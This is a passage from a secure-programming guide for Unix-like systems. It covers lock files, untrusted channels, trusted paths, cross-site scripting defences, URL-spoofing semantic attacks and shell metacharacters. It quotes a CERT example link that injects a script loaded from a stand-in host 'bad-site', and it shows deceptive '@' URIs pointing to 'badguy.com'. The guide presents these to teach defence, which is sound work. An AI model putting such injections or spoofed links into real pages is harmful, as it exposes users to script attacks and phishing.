involving the use of link(2) and stat(2), but it's complex; see Section
7.10.2.1 which has more information about this.

As an aside, it's worth noting that FreeBSD has recently changed the mk*temp
() family to get rid of the PID component of the filename and replace the
entire thing with base-62 encoded randomness. This drastically raises the
number of possible temporary files for the "default" usage of 6 X's, meaning
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
against guessing, except under very frequent usage. However, if you also
follow the guidance here, you'll eliminate the problem they're addressing.

Much of this information on temporary files was derived from Kris Kennaway's
posting to Bugtraq about temporary files on December 15, 2000.

I should note that the Openwall Linux patch from [http://www.openwall.com/
linux/] http://www.openwall.com/linux/ includes an optional ``temporary file
directory'' policy that counters many temporary file based attacks. The Linux
Security Module (LSM) project includes an "owlsm" module that implements some
of the OpenWall ideas, so Linux Kernels with LSM can quickly insert these
rules into a running system. When enabled, it has two protections:

<A0><A0>*<2A>Hard links: Processes may not make hard links to files in certain cases.
    The OpenWall documentation states that "Processes may not make hard links
    to files they do not have write access to." In the LSM version, the rules
    are as follows: if both the process' uid and fsuid (usually the same as
    the euid) is is different from the linked-to-file's uid, the process uid
    is not root, and the process lacks the FOWNER capability, then the hard
    link is forbidden. The check against the process uid may be dropped
    someday (they are work-arounds for the atd(8) program), at which point
    the rules would be: if both the process' fsuid (usually the same as the
    euid) is is different from the linked-to-file's uid and and the process
    lacks the FOWNER capability, then the hard link is forbidden. In other
    words, you can only create hard links to files you own, unless you have
    the FOWNER capability.

<A0><A0>*<2A>Symbolic links (symlinks): Certain symlinks are not followed. The
    original OpenWall documentation states that "root processes may not
    follow symlinks that are not owned by root", but the actual rules (from
    looking at the code) are more complicated. In the LSM version, if the
    directory is sticky ("+t" mode, used in shared directories like /tmp),
    symlinks are not followed if the symlink was created by anyone other than
    either the owner of the directory or the current process' fsuid (which is
    usually the effective uid).


Many systems do not implement this openwall policy, so you can't depend on
this in general protecting your system. However, I encourage using this
policy on your own system, and please make sure that your application will
work when this policy is in place.
-----------------------------------------------------------------------------

7.10.2. Locking

There are often situations in which a program must ensure that it has
exclusive rights to something (e.g., a file, a device, and/or existence of a
particular server process). Any system which locks resources must deal with
the standard problems of locks, namely, deadlocks (``deadly embraces''),
livelocks, and releasing ``stuck'' locks if a program doesn't clean up its
locks. A deadlock can occur if programs are stuck waiting for each other to
release resources. For example, a deadlock would occur if process 1 locks
resources A and waits for resource B, while process 2 locks resource B and
waits for resource A. Many deadlocks can be prevented by simply requiring all
processes that lock multiple resources to lock them in the same order (e.g.,
alphabetically by lock name).
-----------------------------------------------------------------------------

7.10.2.1. Using Files as Locks

On Unix-like systems resource locking has traditionally been done by creating
a file to indicate a lock, because this is very portable. It also makes it
easy to ``fix'' stuck locks, because an administrator can just look at the
filesystem to see what locks have been set. Stuck locks can occur because the
program failed to clean up after itself (e.g., it crashed or malfunctioned)
or because the whole system crashed. Note that these are ``advisory'' (not
``mandatory'') locks - all processes needed the resource must cooperate to
use these locks.

However, there are several traps to avoid. First, don't use the technique
used by very old Unix C programs, which is calling creat() or its open()
equivalent, the open() mode O_WRONLY | O_CREAT | O_TRUNC, with the file mode
set to 0 (no permissions). For normal users on normal file systems, this
works, but this approach fails to lock the file when the user has root
privileges. Root can always perform this operation, even when the file
already exists. In fact, old versions of Unix had this particular problem in
the old editor ``ed'' -- the symptom was that occasionally portions of the
password file would be placed in user's files [Rochkind 1985, 22]! Instead,
if you're creating a lock for processes that are on the local filesystem, you
should use open() with the flags O_WRONLY | O_CREAT | O_EXCL (and again, no
permissions, so that other processes with the same owner won't get the lock).
Note the use of O_EXCL, which is the official way to create ``exclusive''
files; this even works for root on a local filesystem. [Rochkind 1985, 27].

Second, if the lock file may be on an NFS-mounted filesystem, then you have
the problem that NFS version 2 doesn't completely support normal file
semantics. This can even be a problem for work that's supposed to be
``local'' to a client, since some clients don't have local disks and may have
all files remotely mounted via NFS. The manual for open(2) explains how to
handle things in this case (which also handles the case of root programs):

"... programs which rely on [the O_CREAT and O_EXCL flags of open(2) to work
on filesystems accessed via NFS version 2] for performing locking tasks will
contain a race condition. The solution for performing atomic file locking
using a lockfile is to create a unique file on the same filesystem (e.g.,
incorporating hostname and pid), use link(2) to make a link to the lockfile
and use stat(2) on the unique file to check if its link count has increased
to 2. Do not use the return value of the link(2) call."

Obviously, this solution only works if all programs doing the locking are
cooperating, and if all non-cooperating programs aren't allowed to interfere.
In particular, the directories you're using for file locking must not have
permissive file permissions for creating and removing files.

NFS version 3 added support for O_EXCL mode in open(2); see IETF RFC 1813, in
particular the "EXCLUSIVE" value to the "mode" argument of "CREATE". Sadly,
not everyone has switched to NFS version 3 or higher at the time of this
writing, so you can't depend on this yet in portable programs. Still, in the
long run there's hope that this issue will go away.

If you're locking a device or the existence of a process on a local machine,
try to use standard conventions. I recommend using the Filesystem Hierarchy
Standard (FHS); it is widely referenced by Linux systems, but it also tries
to incorporate the ideas of other Unix-like systems. The FHS describes
standard conventions for such locking files, including naming, placement, and
standard contents of these files [FHS 1997]. If you just want to be sure that
your server doesn't execute more than once on a given machine, you should
usually create a process identifier as /var/run/NAME.pid with the pid as its
contents. In a similar vein, you should place lock files for things like
device lock files in /var/lock. This approach has the minor disadvantage of
leaving files hanging around if the program suddenly halts, but it's standard
practice and that problem is easily handled by other system tools.

It's important that the programs which are cooperating using files to
represent the locks use the same directory, not just the same directory name.
This is an issue with networked systems: the FHS explicitly notes that /var/
run and /var/lock are unshareable, while /var/mail is shareable. Thus, if you
want the lock to work on a single machine, but not interfere with other
machines, use unshareable directories like /var/run (e.g., you want to permit
each machine to run its own server). However, if you want all machines
sharing files in a network to obey the lock, you need to use a directory that
they're sharing; /var/mail is one such location. See FHS section 2 for more
information on this subject.
-----------------------------------------------------------------------------

7.10.2.2. Other Approaches to Locking

Of course, you need not use files to represent locks. Network servers often
need not bother; the mere act of binding to a port acts as a kind of lock,
since if there's an existing server bound to a given port, no other server
will be able to bind to that port.

Another approach to locking is to use POSIX record locks, implemented through
fcntl(2) as a ``discretionary lock''. These are discretionary, that is, using
them requires the cooperation of the programs needing the locks (just as the
approach to using files to represent locks does). There's a lot to recommend
POSIX record locks: POSIX record locking is supported on nearly all Unix-like
platforms (it's mandated by POSIX.1), it can lock portions of a file (not
just a whole file), and it can handle the difference between read locks and
write locks. Even more usefully, if a process dies, its locks are
automatically removed, which is usually what is desired.

You can also use mandatory locks, which are based on System V's mandatory
locking scheme. These only apply to files where the locked file's setgid bit
is set, but the group execute bit is not set. Also, you must mount the
filesystem to permit mandatory file locks. In this case, every read(2) and
write(2) is checked for locking; while this is more thorough than advisory
locks, it's also slower. Also, mandatory locks don't port as widely to other
Unix-like systems (they're available on Linux and System V-based systems, but
not necessarily on others). Note that processes with root privileges can be
held up by a mandatory lock, too, making it possible that this could be the
basis of a denial-of-service attack.
-----------------------------------------------------------------------------

7.11. Trust Only Trustworthy Channels

In general, only trust information (input or results) from trustworthy
channels. For example, the routines getlogin(3) and ttyname(3) return
information that can be controlled by a local user, so don't trust them for
security purposes.

In most computer networks (and certainly for the Internet at large), no
unauthenticated transmission is trustworthy. For example, packets sent over
the public Internet can be viewed and modified at any point along their path,
and arbitrary new packets can be forged. These forged packets might include
forged information about the sender (such as their machine (IP) address and
port) or receiver. Therefore, don't use these values as your primary criteria
for security decisions unless you can authenticate them (say using
cryptography).

This means that, except under special circumstances, two old techniques for
authenticating users in TCP/IP should often not be used as the sole
authentication mechanism. One technique is to limit users to ``certain
machines'' by checking the ``from'' machine address in a data packet; the
other is to limit access by requiring that the sender use a ``trusted'' port
number (a number less that 1024). The problem is that in many environments an
attacker can forge these values.

In some environments, checking these values (e.g., the sending machine IP
address and/or port) can have some value, so it's not a bad idea to support
such checking as an option in a program. For example, if a system runs behind
a firewall, the firewall can't be breached or circumvented, and the firewall
stops external packets that claim to be from the inside, then you can claim
that any packet saying it's from the inside really does. Note that you can't
be sure the packet actually comes from the machine it claims it comes from -
so you're only countering external threats, not internal threats. However,
broken firewalls, alternative paths, and mobile code make even these
assumptions suspect.

The problem is supporting untrustworthy information as the only way to
authenticate someone. If you need a trustworthy channel over an untrusted
network, in general you need some sort of cryptologic service (at the very
least, a cryptologically safe hash). See Section 11.5 for more information on
cryptographic algorithms and protocols. If you're implementing a standard and
inherently insecure protocol (e.g., ftp and rlogin), provide safe defaults
and document the assumptions clearly.

The Domain Name Server (DNS) is widely used on the Internet to maintain
mappings between the names of computers and their IP (numeric) addresses. The
technique called ``reverse DNS'' eliminates some simple spoofing attacks, and
is useful for determining a host's name. However, this technique is not
trustworthy for authentication decisions. The problem is that, in the end, a
DNS request will be sent eventually to some remote system that may be
controlled by an attacker. Therefore, treat DNS results as an input that
needs validation and don't trust it for serious access control.

Arbitrary email (including the ``from'' value of addresses) can be forged as
well. Using digital signatures is a method to thwart many such attacks. A
more easily thwarted approach is to require emailing back and forth with
special randomly-created values, but for low-value transactions such as
signing onto a public mailing list this is usually acceptable.

Note that in any client/server model, including CGI, that the server must
assume that the client (or someone interposing between the client and server)
can modify any value. For example, so-called ``hidden fields'' and cookie
values can be changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken. For example,
the hidden fields could be signed in a way the client cannot forge as long as
the server checks the signature. The hidden fields could also be encrypted
using a key only the trusted server could decrypt (this latter approach is
the basic idea behind the Kerberos authentication system). InfoSec labs has
further discussion about hidden fields and applying encryption at [http://
www.infoseclabs.com/mschff/mschff.htm] http://www.infoseclabs.com/mschff/
mschff.htm. In general, you're better off keeping data you care about at the
server end in a client/server model. In the same vein, don't depend on
HTTP_REFERER for authentication in a CGI program, because this is sent by the
user's browser (not the web server).

This issue applies to data referencing other data, too. For example, HTML or
XML allow you to include by reference other files (e.g., DTDs and style
sheets) that may be stored remotely. However, those external references could
be modified so that users see a very different document than intended; a
style sheet could be modified to ``white out'' words at critical locations,
deface its appearance, or insert new text. External DTDs could be modified to
prevent use of the document (by adding declarations that break validation) or
insert different text into documents [St. Laurent 2000].
-----------------------------------------------------------------------------

7.12. Set up a Trusted Path

The counterpart to needing trustworthy channels (see Section 7.11) is
assuring users that they really are working with the program or system they
intended to use.

The traditional example is a ``fake login'' program. If a program is written
to look like the login screen of a system, then it can be left running. When
users try to log in, the fake login program can then capture user passwords
for later use.

A solution to this problem is a ``trusted path.'' A trusted path is simply
some mechanism that provides confidence that the user is communicating with
what the user intended to communicate with, ensuring that attackers can't
intercept or modify whatever information is being communicated.

If you're asking for a password, try to set up trusted path. Unfortunately,
stock Linux distributions and many other Unixes don't have a trusted path
even for their normal login sequence. One approach is to require pressing an
unforgeable key before login, e.g., Windows NT/2000 uses
``control-alt-delete'' before logging in; since normal programs in Windows
can't intercept this key pattern, this approach creates a trusted path.
There's a Linux equivalent, termed the Secure Attention Key (SAK); it's
recommended that this be mapped to ``control-alt-pause''. Unfortunately, at
the time of this writing SAK is immature and not well-supported by Linux
distributions. Another approach for implementing a trusted path locally is to
control a separate display that only the login program can perform. For
example, if only trusted programs could modify the keyboard lights (the LEDs
showing Num Lock, Caps Lock, and Scroll Lock), then a login program could
display a running pattern to indicate that it's the real login program.
Unfortunately, since in current Linux normal users can change the LEDs, the
LEDs can't currently be used to confirm a trusted path.

Sadly, the problem is much worse for network applications. Although setting
up a trusted path is desirable for network applications, completely doing so
is quite difficult. When sending a password over a network, at the very least
encrypt the password between trusted endpoints. This will at least prevent
eavesdropping of passwords by those not connected to the system, and at least
make attacks harder to perform. If you're concerned about trusted path for
the actual communication, make sure that the communication is encrypted and
authenticated (or at least authenticated).

It turns out that this isn't enough to have a trusted path to networked
applications, in particular for web-based applications. There are documented
methods for fooling users of web browsers into thinking that they're at one
place when they are really at another. For example, Felten [1997] discusses
``web spoofing'', where users believe they're viewing one web page when in
fact all the web pages they view go through an attacker's site (who can then
monitor all traffic and modify any data sent in either direction). This is
accomplished by rewriting URL. The rewritten URLs can be made nearly
invisible by using other technology (such as Javascript) to hide any possible
evidence in the status line, location line, and so on. See their paper for
more details. Another technique for hiding such URLs is exploiting
rarely-used URL syntax, for example, the URL ``http://www.ibm.com/
stuff@mysite.com'' is actually a request to view ``mysite.com'' (a
potentially malevolent site) using the unusual username ``www.ibm.com/stuff'.
If the URL is long enough, the real material won't be displayed and users are
unlikely to notice the exploit anyway. Yet another approach is to create
sites with names deliberately similar to the ``real'' site - users may not
know the difference. In all of these cases, simply encrypting the line
doesn't help - the attacker can be quite content in encrypting data while
completely controlling what's shown.

Countering these problems is more difficult; at this time I have no good
technical solution for fully preventing ``fooled'' web users. I would
encourage web browser developers to counter such ``fooling'', making it
easier to spot. If it's critical that your users correctly connect to the
correct site, have them use simple procedures to counter the threat. Examples
include having them halt and restart their browser, and making sure that the
web address is very simple and not normally misspelled (so misspelling it is
unlikely). You might also want to gain ownership of some ``similar'' sounding
DNS names, and search for other such DNS names and material to find
attackers.
-----------------------------------------------------------------------------

7.13. Use Internal Consistency-Checking Code

The program should check to ensure that its call arguments and basic state
assumptions are valid. In C, macros such as assert(3) may be helpful in doing
so.
-----------------------------------------------------------------------------

7.14. Self-limit Resources

In network daemons, shed or limit excessive loads. Set limit values (using
setrlimit(2)) to limit the resources that will be used. At the least, use
setrlimit(2) to disable creation of ``core'' files. For example, by default
Linux will create a core file that saves all program memory if the program
fails abnormally, but such a file might include passwords or other sensitive
data.
-----------------------------------------------------------------------------

7.15. Prevent Cross-Site (XSS) Malicious Content

Some secure programs accept data from one untrusted user (the attacker) and
pass that data on to a different user's application (the victim). If the
secure program doesn't protect the victim, the victim's application (e.g.,
their web browser) may then process that data in a way harmful to the victim.
This is a particularly common problem for web applications using HTML or XML,
where the problem goes by several names including ``cross-site scripting'',
``malicious HTML tags'', and ``malicious content.'' This book will call this
problem ``cross-site malicious content,'' since the problem isn't limited to
scripts or HTML, and its cross-site nature is fundamental. Note that this
problem isn't limited to web applications, but since this is a particular
problem for them, the rest of this discussion will emphasize web
applications. As will be shown in a moment, sometimes an attacker can cause a
victim to send data from the victim to the secure program, so the secure
program must protect the victim from himself.
-----------------------------------------------------------------------------

7.15.1. Explanation of the Problem

Let's begin with a simple example. Some web applications are designed to
permit HTML tags in data input from users that will later be posted to other
readers (e.g., in a guestbook or ``reader comment'' area). If nothing is done
to prevent it, these tags can be used by malicious users to attack other
users by inserting scripts, Java references (including references to hostile
applets), DHTML tags, early document endings (via </HTML>), absurd font size
requests, and so on. This capability can be exploited for a wide range of
effects, such as exposing SSL-encrypted connections, accessing restricted web
sites via the client, violating domain-based security policies, making the
web page unreadable, making the web page unpleasant to use (e.g., via
annoying banners and offensive material), permit privacy intrusions (e.g., by
inserting a web bug to learn exactly who reads a certain page), creating
denial-of-service attacks (e.g., by creating an ``infinite'' number of
windows), and even very destructive attacks (by inserting attacks on security
vulnerabilities such as scripting languages or buffer overflows in browsers).
By embedding malicious FORM tags at the right place, an intruder may even be
able to trick users into revealing sensitive information (by modifying the
behavior of an existing form). Or, by embedding scripts, an intruder can
cause no end of problems. This is by no means an exhaustive list of problems,
but hopefully this is enough to convince you that this is a serious problem.

Most ``discussion boards'' have already discovered this problem, and most
already take steps to prevent it in text intended to be part of a multiperson
discussion. Unfortunately, many web application developers don't realize that
this is a much more general problem. Every data value that is sent from one
user to another can potentially be a source for cross-site malicious posting,
even if it's not an ``obvious'' case of an area where arbitrary HTML is
expected. The malicious data can even be supplied by the user himself, since
the user may have been fooled into supplying the data via another site.
Here's an example (from CERT) of an HTML link that causes the user to send
malicious data to another site:
 <A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT
 SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>

In short, a web application cannot accept input (including any form data)
without checking, filtering, or encoding it. You can't even pass that data
back to the same user in many cases in web applications, since another user
may have surreptitiously supplied the data. Even if permitting such material
won't hurt your system, it will enable your system to be a conduit of attacks
to your users. Even worse, those attacks will appear to be coming from your
system.

CERT describes the problem this way in their advisory:


    A web site may inadvertently include malicious HTML tags or script in a
    dynamically generated page based on unvalidated input from untrustworthy
    sources (CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client
    Web Requests).

More information from CERT about this is available at [http://www.cert.org/
archive/pdf/cross_site_scripting.pdf] http://www.cert.org/archive/pdf/
cross_site_scripting.pdf.
-----------------------------------------------------------------------------

7.15.2. Solutions to Cross-Site Malicious Content

Fundamentally, this means that all web application output impacted by any
user must be filtered (so characters that can cause this problem are
removed), encoded (so the characters that can cause this problem are encoded
in a way to prevent the problem), or validated (to ensure that only ``safe''
data gets through). This includes all output derived from input such as URL
parameters, form data, cookies, database queries, CORBA ORB results, and data
from users stored in files. In many cases, filtering and validation should be
done at the input, but encoding can be done during either input validation or
output generation. If you're just passing the data through without analysis,
it's probably better to encode the data on input (so it won't be forgotten).
However, if your program processes the data, it can be easier to encode it on
output instead. CERT recommends that filtering and encoding be done during
data output; this isn't a bad idea, but there are many cases where it makes
sense to do it at input instead. The critical issue is to make sure that you
cover all cases for every output, which is not an easy thing to do regardless
of approach.

Warning - in many cases these techniques can be subverted unless you've also
gained control over the character encoding of the output. Otherwise, an
attacker could use an ``unexpected'' character encoding to subvert the
techniques discussed here. Thankfully, this isn't hard; gaining control over
output character encoding is discussed in Section 9.5.

One minor defense, that's often worth doing, is the "HttpOnly" flag for
cookies. Scripts that run in a web browser cannot access cookie values that
have the HttpOnly flag set (they just get an empty value instead). This is
currently implemented in Microsoft Internet Explorer, and I expect Mozilla/
Netscape to implement this soon too. You should set HttpOnly on for any
cookie you send, unless you have scripts that need the cookie, to counter
certain kinds of cross-site scripting (XSS) attacks. However, the HttpOnly
flag can be circumvented in a variety of ways, so using as your primary
defense is inappropriate. Instead, it's a helpful secondary defense that may
help save you in case your application is written incorrectly.

The first subsection below discusses how to identify special characters that
need to be filtered, encoded, or validated. This is followed by subsections
describing how to filter or encode these characters. There's no subsection
discussing how to validate data in general, however, for input validation in
general see Chapter 5, and if the input is straight HTML text or a URI, see
Section 5.11. Also note that your web application can receive malicious
cross-postings, so non-queries should forbid the GET protocol (see Section
5.12).
-----------------------------------------------------------------------------

7.15.2.1. Identifying Special Characters

Here are the special characters for a variety of circumstances (my thanks to
the CERT, who developed this list):

<A0><A0>*<2A>In the content of a block-level element (e.g., in the middle of a
    paragraph of text in HTML or a block in XML):

    <20><>+<2B>"<" is special because it introduces a tag.

    <20><>+<2B>"&" is special because it introduces a character entity.

    <20><>+<2B>">" is special because some browsers treat it as special, on the
        assumption that the author of the page really meant to put in an
        opening "<", but omitted it in error.


<A0><A0>*<2A>In attribute values:

    <20><>+<2B>In attribute values enclosed with double quotes, the double quotes
        are special because they mark the end of the attribute value.

    <20><>+<2B>In attribute values enclosed with single quote, the single quotes are
        special because they mark the end of the attribute value. XML's
        definition allows single quotes, but I've been told that some XML
        parsers don't handle them correctly, so you might avoid using single
        quotes in XML.

    <20><>+<2B>Attribute values without any quotes make the white-space characters
        such as space and tab special. Note that these aren't legal in XML
        either, and they make more characters special. Thus, I recommend
        against unquoted attributes if you're using dynamically generated
        values in them.

    <20><>+<2B>"&" is special when used in conjunction with some attributes because
        it introduces a character entity.


<A0><A0>*<2A>In URLs, for example, a search engine might provide a link within the
    results page that the user can click to re-run the search. This can be
    implemented by encoding the search query inside the URL. When this is
    done, it introduces additional special characters:

    <20><>+<2B>Space, tab, and new line are special because they mark the end of the
        URL.

    <20><>+<2B>"&" is special because it introduces a character entity or separates
        CGI parameters.

    <20><>+<2B>Non-ASCII characters (that is, everything above 128 in the ISO-8859-1
        encoding) aren't allowed in URLs, so they are all special here.

    <20><>+<2B>The "%" must be filtered from input anywhere parameters encoded with
        HTTP escape sequences are decoded by server-side code. The percent
        must be filtered if input such as "%68%65%6C%6C%6F" becomes "hello"
        when it appears on the web page in question.


<A0><A0>*<2A>Within the body of a <SCRIPT> </SCRIPT> the semicolon, parenthesis, curly
    braces, and new line should be filtered in situations where text could be
    inserted directly into a preexisting script tag.

<A0><A0>*<2A>Server-side scripts that convert any exclamation characters (!) in input
    to double-quote characters (") on output might require additional
    filtering.


Note that, in general, the ampersand (&) is special in HTML and XML.
-----------------------------------------------------------------------------

7.15.2.2. Filtering

One approach to handling these special characters is simply eliminating them
(usually during input or output).

If you're already validating your input for valid characters (and you
generally should), this is easily done by simply omitting the special
characters from the list of valid characters. Here's an example in Perl of a
filter that only accepts legal characters, and since the filter doesn't
accept any special characters other than the space, it's quite acceptable for
use in areas such as a quoted attribute:
 # Accept only legal characters:
 $summary =~ tr/A-Za-z0-9\ \.\://dc;

However, if you really want to strip away only the smallest number of
characters, then you could create a subroutine to remove just those
characters:
 sub remove_special_chars {
  local($s) = @_;
  $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;
  return $s;
 }
 # Sample use:
 $data = &remove_special_chars($data);
-----------------------------------------------------------------------------

7.15.2.3. Encoding (Quoting)

An alternative to removing the special characters is to encode them so that
they don't have any special meaning. This has several advantages over
filtering the characters, in particular, it prevents data loss. If the data
is "mangled" by the process from the user's point of view, at least when the
data is encoded it's possible to reconstruct the data that was originally
sent.

HTML, XML, and SGML all use the ampersand ("&") character as a way to
introduce encodings in the running text; this encoding is often called ``HTML
encoding.'' To encode these characters, simply transform the special
characters in your circumstance. Usually this means '<' becomes '&lt;', '>'
becomes '&gt;', '&' becomes '&amp;', and '"' becomes '&quot;'. As noted
above, although in theory '>' doesn't need to be quoted, because some
browsers act on it (and fill in a '<') it needs to be quoted. There's a minor
complexity with the double-quote character, because '&quot;' only needs to be
used inside attributes, and some extremely old browsers don't properly render
it. If you can handle the additional complexity, you can try to encode '"'
only when you need to, but it's easier to simply encode it and ask users to
upgrade their browsers. Few users will use such ancient browsers, and the
double-quote character encoding has been a standard for a long time.

Scripting languages may consider implementing specialized auto-quoting types,
the interesting approach developed in the web application framework [http://
www.mems-exchange.org/software/quixote] Quixote. Quixote includes a
"template" feature which allows easy mixing of HTML text and Python code;
text generated by a template is passed back to the web browser as an HTML
document. As of version 0.6, Quixote has two kinds of text (instead of a
single kind as most such languages). Anything which appears in a literal,
quoted string is of type "htmltext," and it is assumed to be exactly as the
programmer wanted it to be (this is reasoble, since the programmer wrote it).
Anything which takes the form of an ordinary Python string, however, is
automatically quoted as the template is executed. As a result, text from a
database or other external source is automatically quoted, and cannot be used
for a cross-site scripting attack. Thus, Quixote implements a safe default -
programmers no longer need to worry about quoting every bit of text that
passes through the application (bugs involving too much quoting are less
likely to be a security problem, and will be obvious in testing). Quixote
uses an open source software license, but because of its venue identification
it is probably GPL-incompatible, and is used by organizations such as the
[http://lwn.net] Linux Weekly News.

This approach to HTML encoding isn't quite enough encoding in some
circumstances. As discussed in Section 9.5, you need to specify the output
character encoding (the ``charset''). If some of your data is encoded using a
different character encoding than the output character encoding, then you'll
need to do something so your output uses a consistent and correct encoding.
Also, you've selected an output encoding other than ISO-8859-1, then you need
to make sure that any alternative encodings for special characters (such as "
<") can't slip through to the browser. This is a problem with several
character encodings, including popular ones like UTF-7 and UTF-8; see Section
5.9 for more information on how to prevent ``alternative'' encodings of
characters. One way to deal with incompatible character encodings is to first
translate the characters internally to ISO 10646 (which has the same
character values as Unicode), and then using either numeric character
references or character entity references to represent them:

<A0><A0>*<2A>A numeric character reference looks like "&#D;", where D is a decimal
    number, or "&#xH;" or "&#XH;", where H is a hexadecimal number. The
    number given is the ISO 10646 character id (which has the same character
    values as Unicode). Thus &#1048; is the Cyrillic capital letter "I". The
    hexadecimal system isn't supported in the SGML standard (ISO 8879), so
    I'd suggest using the decimal system for output. Also, although SGML
    specification permits the trailing semicolon to be omitted in some
    circumstances, in practice many systems don't handle it - so always
    include the trailing semicolon.

<A0><A0>*<2A>A character entity reference does the same thing but uses mnemonic names
    instead of numbers. For example, "&lt;" represents the < sign. If you're
    generating HTML, see the [http://www.w3.org] HTML specification which
    lists all mnemonic names.


Either system (numeric or character entity) works; I suggest using character
entity references for '<', '>', '&', and '"' because it makes your code (and
output) easier for humans to understand. Other than that, it's not clear that
one or the other system is uniformly better. If you expect humans to edit the
output by hand later, use the character entity references where you can,
otherwise I'd use the decimal numeric character references just because
they're easier to program. This encoding scheme can be quite inefficient for
some languages (especially Asian languages); if that is your primary content,
you might choose to use a different character encoding (charset), filter on
the critical characters (e.g., "<") and ensure that no alternative encodings
for critical characters are allowed.

URIs have their own encoding scheme, commonly called ``URL encoding.'' In
this system, characters not permitted in URLs are represented using a percent
sign followed by its two-digit hexadecimal value. To handle all of ISO 10646
(Unicode), it's recommended to first translate the codes to UTF-8, and then
encode it. See Section 5.11.4 for more about validating URIs.
-----------------------------------------------------------------------------

7.16. Foil Semantic Attacks

A ``semantic attack'' is an attack in which the attacker uses the computing
infrastructure/system in a way that fools the victim into thinking they are
doing something, but are doing something different, yet the computing
infrastructure/system is working exactly as it was designed to do. Semantic
attacks often involve financial scams, where the attacker is trying to fool
the victim into giving the attacker large sums of money (e.g., thinking
they're investing in something). For example, the attacker may try to
convince the user that they're looking at a trusted website, even if they
aren't.

Semantic attacks are difficult to counter, because they're exploiting the
correct operation of the computer. The way to deal with semantic attacks is
to help give the human additional information, so that when ``odd'' things
happen the human will have more information or a warning will be presented
that something may not be what it appears to be.

One example is URIs that, while legitimate, may fool users into thinking they
have a different meaning. For example, look at this URI:
  http://www.bloomberg.com@www.badguy.com
If a user clicked on that URI, they might think that they're going to
Bloomberg (who provide financial commodities news), but instead they're going
to www.badguy.com (and providing the username www.bloomberg.com, which
www.badguy.com will conveniently ignore). If the badguy.com website then
imitated the bloomberg.com site, a user might be convinced that they're
seeing the real thing (and make investment decisions based on
attacker-controlled information). This depends on URIs being used in an
unusual way - clickable URIs can have usernames, but usually don't. One
solution for this case is for the web browser to detect such unusual URIs and
create a pop-up confirmation widget, saying ``You are about to log into
www.badguy.com as user www.bloomberg.com; do you wish to proceed?'' If the
widget allows the user to change these entries, it provides additional
functionality to the user as well as providing protection against that
attack.

Another example is homographs, particularly international homographs. Certain
letters look similar to each other, and these can be exploited as well. For
example, since 0 (zero) and O (the letter O) look similar to each other,
users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM are
different web addresses. Other similar-looking letters include 1 (one) and l
(lower-case L). If international characters are allowed, the situation is
worse. For example, many Cyrillic letters look essentially the same as Roman
letters, but the computer will treat them differently. Currently most systems
don't allow international characters in host names, but for various good
reasons it's widely agreed that support for them will be necessary in the
future. One proposed solution has been to diplay letters from different code
regions using different colors - that way, users get more information
visually. If the users look at URI, they will hopefully notice the strange
coloring. [Gabrilovich 2002] However, this does show the essence of a
semantic attack - it's difficult to defend against, precisely because the
computers are working correctly.
-----------------------------------------------------------------------------

7.17. Be Careful with Data Types

Be careful with the data types used, in particular those used in interfaces.
For example, ``signed'' and ``unsigned'' values are treated differently in
many languages (such as C or C++).
-----------------------------------------------------------------------------

Chapter 8. Carefully Call Out to Other Resources

<A0>                                      Do not put your trust in princes, in
                                       mortal men, who cannot save.
<A0>                                                          Psalms 146:3 (NIV)

Practically no program is truly self-contained; nearly all programs call out
to other programs for resources, such as programs provided by the operating
system, software libraries, and so on. Sometimes this calling out to other
resources isn't obvious or involves a great deal of ``hidden'' infrastructure
which must be depended on, e.g., the mechanisms to implement dynamic
libraries. Clearly, you must be careful about what other resources your
program trusts and you must make sure that the way you send requests to them.
-----------------------------------------------------------------------------

8.1. Call Only Safe Library Routines

Sometimes there is a conflict between security and the development principles
of abstraction (information hiding) and reuse. The problem is that some
high-level library routines may or may not be implemented securely, and their
specifications won't tell you. Even if a particular implementation is secure,
it may not be possible to ensure that other versions of the routine will be
safe, or that the same interface will be safe on other platforms.

In the end, if your application must be secure, you must sometimes
re-implement your own versions of library routines. Basically, you have to
re-implement routines if you can't be sure that the library routines will
perform the necessary actions you require for security. Yes, in some cases
the library's implementation should be fixed, but it's your users who will be
hurt if you choose a library routine that is a security weakness. If can, try
to use the high-level interfaces when you must re-implement something - that
way, you can switch to the high-level interface on systems where its use is
secure.

If you can, test to see if the routine is secure or not, and use it if it's
secure - ideally you can perform this test as part of compilation or
installation (e.g., as part of an ``autoconf'' script). For some conditions
this kind of run-time testing is impractical, but for other conditions, this
can eliminate many problems. If you don't want to bother to re-implement the
library, at least test to make sure it's safe and halt installation if it
isn't. That way, users will not accidentally install an insecure program and
will know what the problem is.
-----------------------------------------------------------------------------

8.2. Limit Call-outs to Valid Values

Ensure that any call out to another program only permits valid and expected
values for every parameter. This is more difficult than it sounds, because
many library calls or commands call lower-level routines in potentially
surprising ways. For example, many system calls are implemented indirectly by
calling the shell, which means that passing characters which are shell
metacharacters can have dangerous effects. So, let's discuss metacharacters.
-----------------------------------------------------------------------------

8.3. Handle Metacharacters

Many systems, such as the command line shell and SQL interpreters, have
``metacharacters'', that is, characters in their input that are not
interpreted as data. Such characters might commands, or delimit data from
commands or other data. If there's a language specification for that system's
interface that you're using, then it certainly has metacharacters. If your
program invokes those other systems and allows attackers to insert such
metacharacters, the usual result is that an attacker can completely control
your program.

One of the most pervasive metacharacter problems are those involving shell
metacharacters. The standard Unix-like command shell (stored in /bin/sh)
interprets a number of characters specially. If these characters are sent to
the shell, then their special interpretation will be used unless escaped;
this fact can be used to break programs. According to the WWW Security FAQ
[Stein 1999, Q37], these metacharacters are:
+---------------------------------------------------------------------------+
|& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r                              |
+---------------------------------------------------------------------------+

I should note that in many situations you'll also want to escape the tab and
space characters, since they (and the newline) are the default parameter
separators. The separator values can be changed by setting the IFS
environment variable, but if you can't trust the source of this variable you
should have thrown it out or reset it anyway as part of your environment
variable processing.

Unfortunately, in real life this isn't a complete list. Here are some other
characters that can be problematic:

<A0><A0>*<2A>'!' means ``not'' in an expression (as it does in C); if the return value
    of a program is tested, prepending ! could fool a script into thinking
    something had failed when it succeeded or vice versa. In some shells, the
